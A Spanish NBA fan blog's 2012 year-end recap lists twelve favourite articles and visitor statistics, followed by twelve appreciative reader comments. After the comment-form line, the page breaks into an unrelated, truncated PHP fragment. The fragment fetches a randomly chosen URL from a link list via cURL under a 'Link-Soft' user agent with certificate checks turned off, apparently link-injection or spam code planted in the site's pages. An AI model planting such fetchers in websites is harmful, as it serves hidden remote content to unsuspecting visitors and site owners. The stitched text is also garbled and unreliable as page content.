2012. Hacia el infinito y más allá

30 de December de 2012 por txusma

Con éste ya serán 5 los artículos-resumen que habremos escrito (2011, 2010, 2009, 2008). Si alguien me lo explica en septiembre de 2007 le habría respondido que no tenía fe ni nada. ¿Cómo íbamos a estar 5 años al pie del cañón día sí y día también?

Misterio, ninguno. Escribimos de lo que nos gusta y aún nos gusta más comprobar que hay mucha gente nos lee y que ha encontrado en este modestísimo blog su reducto particular. El refugio para auténticos amantes de la NBA a los que les interesa algo más que la ÑBA y las noticias del MARCA. Mientras nuestros artículos tengan un comentario y la salud y la disponibidad exista, no abandonaremos y seguiremos informando, opinando, debatiendo y divirtiéndonos con vosotros.

Dicen las estadísticas que desde que abrimos el blog hemos tenido 1.327.506 visitantes y que de estos, 413.014 han sido solo en 2012, 1.135 al día. Cada año nos hemos superado y esperamos mejorar nuevamente en 2013.

Sin más dilación vamos a recordar 12 artículos de este 2012:

Capítulo1: Asesinos en Serie – Primer y único post de una sección que promete. Seguro que cuando Sancho acabe de instalarse y pueda volver a su actividad habitual nos obsequiará con más artículos locos de esos que tanto nos gustan.

Gigantesco laberinto como tributo a los Thunder – Esta temporada hemos estrenado la categoría ‘Miscelánea’, donde caben todas las curiosidades que genera la NBA. Este fue el primer artículo. Hay mucho friki suelto…

¿Quién fue Lafayette ‘Fat’ Lever? – Cuando hay tiempo, siempre procuramos echar la vista atrás y recordar a grandes jugadores que por unas cosas o por otras no han pasado a la historia de la liga. Para mí el caso de Fat Lever es paradigmático: cada cierto tiempo releo el artículo y me maravillo e indigno a partes iguales.

Reflexiones sobre la bocina #8 – Escogemos este porque generó 51 comentarios pero todos los artículos de ‘Reflexiones sobre la bocina’ merecen ser releídos y disfrutados. Esperemos que Magic no se canse nunca de escribirlos.

Informe del fin de semana: Ricky Rubio deja su firma – Llegar y besar el santo. Un chaval del Masnou mantuvo a la mejor liga del mundo con la boca abierta mientras estuvo sano. Este fue su primer gran partido y su carta de presentación ante los, a la postre, campeones.

Draft 2012 – El 28 de junio se llevó a cabo el draft y este artículo marcaba el punto y final de nuestro seguimiento. Melo nos mantuvo informados a base de mocks y Deer explicaba las diferentes elecciones a la vez que se tiraba algún que otro pronóstico. Momento de repasar.

La Crónica: The Magic King – Lo que hizo la temporada pasada Lebron James fue muy grande, aunque es posible que no lo valoremos lo suficiente al poder vivirlo en primera persona. El rey ya tiene su corona.

Trivial: Dallas Comegys y Goran Grbovic – Es cierto que lo tenemos algo abandonado pero el trivial nos ha entretenido durante buena parte del año. Olafur nos planteó la primera pregunta que nadie supo responder a la primera. La verdad es que era rebuscadísima pero han de ser así para que google no nos dé la respuesta a la primera.

Fin de semana, cobertura popular – No es vagancia, es salud mental. A principios de la temporada pasada decidimos descansar los fines de semana y dedicarnos a nuestras familias y amigos, que también se lo merecen. Dejamos el blog en mano de los comentaristas habituales y estos respondieron con 162 comentarios. Brutal.

La pregunta: De vez en cuando nos descolgamos con una pregunta directa. Esta en concreto versaba sobre el que debería ser el nuevo entrenador de los Lakers en sustitución de Mike Brown. Es mentar a la franquicia de California y caer el servidor por sobrecarga de opiniones.

La madre de todos los partidos: Durante los JJOO de Londres fue un debate recurrente: ¿Qué Dream Team era mejor? ¿El del 2012 o el de 1992? HisRoyalAirness nos aportaba su opinión y allí aparecimos todos para rebatir todo lo rebatible. ¡Cómo nos gusta!

Rumorología variada – Más de 4.000 visitas generó este artículo. Había interés por saber dónde acabaría Deron Williams. A lo mejor si hubiéramos sabidos cómo iba a ser su rendimiento esta temporada las expectativas no habrían sido tan elevadas.

La Crónica: Detroit por fin gana – Valga como homenaje a todos los que se curran las crónicas y sobre todo a Sancho, Simon y HisRoyalAirness, que nos echan una mano en esta dura tarea siempre que pueden.

¡Feliz año 2013!

Comenta

12 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Creo que, independientemente de las estadísticas, ha sido un gran año para el blog. Información, análisis, opinión, y sobre todo, verdadera pasión por la NBA, que es lo que en definitiva sentimos y buscamos todos los que visitamos y participamos de TJ. Gracias a todos los autores, a los que leéis y a los que comentáis.

    Por la parte que me toca, yo no me cansaré de escribir las ‘Reflexiones’ mientras vosotros no os canséis de leerlas. Si pensabais que el consultorio del Dr. M era lo más friki que iba a escribir, esperad y veréis, jaja. Eso sí, a mi ritmo, claro.

    Felicísimo 2013 para todos.

      Citar

  2. neo dice:
    #2

    No suelo escribir pero os leo fielmente cada día y os aseguro que sois la mejor web/blog en castellano que se puede encontrar por estos lares sobre NBA. Enhorabuena por el excelente trabajo que hacéis, seguir así y no cambiéis. Feliz Año.

      Citar

  3. Ruxixón dice:
    #3

    Gracias al blog por existir y a la gente por participar de una pasión común que es la NBA,¡feliz año señor@s!Larga vida a TJNBA!!

      Citar

  4. German dice:
    #4

    No participo mucho pero entro absolutamente todos los dias a leer las cronicas y los comentarios. Es un placer leerlos a todos. Llevo mas de 3 años ya en este blog y sinceramente no lo cambio por ningun otro medio para informarme sobre la NBA.

    Muy feliz año nuevo para todos y gracias por el empeño que le dan dia a dia al blog!

      Citar

  5. Chipi dice:
    #5

    Sólo hay que decir dos palabras: Enhorabuena y gracias.

    Enhorabuena porque tenéis que estar muy orgullosos de lo bien que hacéis las cosas y de la legión de amigos que habéis conseguido en estos años.

    Y gracias por la forma que tenéis de llevar este sitio. Personalmente no puedo ver más que un par de partidos semanales, así que es un gustazo tener un sitio donde me informan con rigor, buen humor, buen rollo, con unos conocimientos alucinantes y promoviendo la participación y el debate. Si seguís así esto durará hasta que vosotros queráis, porque nosotros no nos vamos a cansar nunca.

    Un fuerte abrazo y muy feliz año a toda la familia del blog.

      Citar

  6. Pop dice:
    #6

    Además de la calidad enorme de este blog, es sin duda también el que mejor ambiente tiene y mejor rollo hay entre los comentaristas de todos los que sigo. Sin duda mi favorito.

    Feliz año a todos!

      Citar

  7. pronosticos deportivos dice:
    #7

    Sin duda el mejor blog de NBA que se puede ver en castellano a día de hoy… aunque echo en falta más artículos relacionados con españoles!

      Citar

  8. Vader dice:
    #8

    Feliz año a todos y gran trabajo!!!

      Citar

  9. León Van Bon dice:
    #9

    Sin duda el mejor blog en español. Disculpas por no comentar pero soy novato comparado con las eminencias que hay por aquí y me abruma la responsabilidad 😉

    Muchas gracias por el blog y a los comentaristas habituales. ¿Para cuando un botón de donaciones? A un par de cervecitas os invitaría con gusto.

    Feliz año 2013 y por favor, simplemente seguid así!!

      Citar

  10. simon dice:
    #10

    Este ha sido mi primer año completo visitando el blog a diario y realmente me siento afortunado de haberlo encontrado para colmar gran parte de mis expectativas en cuanto a información e interacción, que para mi es lo mas importante que tiene este pequeñito pero enorme blog. Lo hacemos todos, los creadores del TJNBA, los que escribimos de vez en cuando, los que comentan a diario, los que comentan de vez en cuando, siempre se crean debates, se discute, se intercambian opiniones, pero siempre desde el respeto y de una forma muy acojedora, lo cual es muy complicado encontrar hoy en día algo así por la red.
    Por la parte que me toca deciros que mientras se pueda estoy encantado de echaros una mano, cualquier cosa para que TJNBA siga adelante, pues creo que si lo perdieramos, todos quedaríamos un poco huerfanos y nuestra pasión, la NBA, que es lo que al fin y al cabo nos reune aquí sería un poquito mas lejana.
    El 2013 seguro será aun mejor que este 2012 , que ya ha sido muy bueno de por sí, pues esto no para de crecer.
    Feliz año nuevo.

      Citar

  11. rumbero dice:
    #11

    Si es que lo haceis muy bien leñe, normal que cada año se pase más gente por aquí. Es difícil encontrar un blog con más calidad en las crónicas/artículos como en los comentarios de la gente. Enhorabuena y feliz 2013 para todos

      Citar

  12. safd dice:
    #12

    Lo mejor del blog es lo q le falta a todos los demas, la constancia, no hay dia en el que sepas (mas alla de fines de semana) q hay un post, y eso se nota mucho

    Ademas, siempre hay mucha gente comentando y a mi particularmente me engancha casi tanto como los posts XD

    Feliz año y a seguir igual, que no es poco!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>